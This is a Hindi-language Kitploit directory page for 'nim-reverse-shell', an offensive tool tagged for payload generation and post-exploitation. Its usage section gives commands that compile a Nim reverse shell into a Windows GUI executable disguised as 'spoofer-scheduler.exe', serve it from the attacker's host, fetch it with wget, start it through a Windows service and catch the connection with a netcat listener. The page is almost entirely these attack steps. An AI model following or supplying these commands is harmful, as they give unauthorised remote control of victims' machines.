Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
nim-reverse-shell — nim-reverse-shell | Kitploit
उपकरण/GitHubGitHub/h3x0v3rl0rd/nim-reverse-shell
Payload GenerationPost-ExploitationPenetration TestingRed TeamingRemote Access Tool
GitHubh3x0v3rl0rd/nim-reverse-shell

nim-reverse-shell

nim-reverse-shell

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

nim-reverse-shell

nim-reverse-shell

उदाहरण:

root@kitploit:~
sudo apt install nim

स्क्रिप्ट को तदनुसार अपडेट करें

image

root@kitploit:~
nim c -d:mingw --app:gui --opt:speed -o:spoofer-scheduler.exe reverse.nim

image

root@kitploit:~
python3 -m http.server 8888
root@kitploit:~
wget http://tun0:8888/spoofer-scheduler.exe -o spoofer-scheduler.exe

image

root@kitploit:~
sc.exe stop spoofer-scheduler
sc.exe start spoofer-scheduler

image

root@kitploit:~
nc -nlvp 8080

image

टूल डाउनलोड करें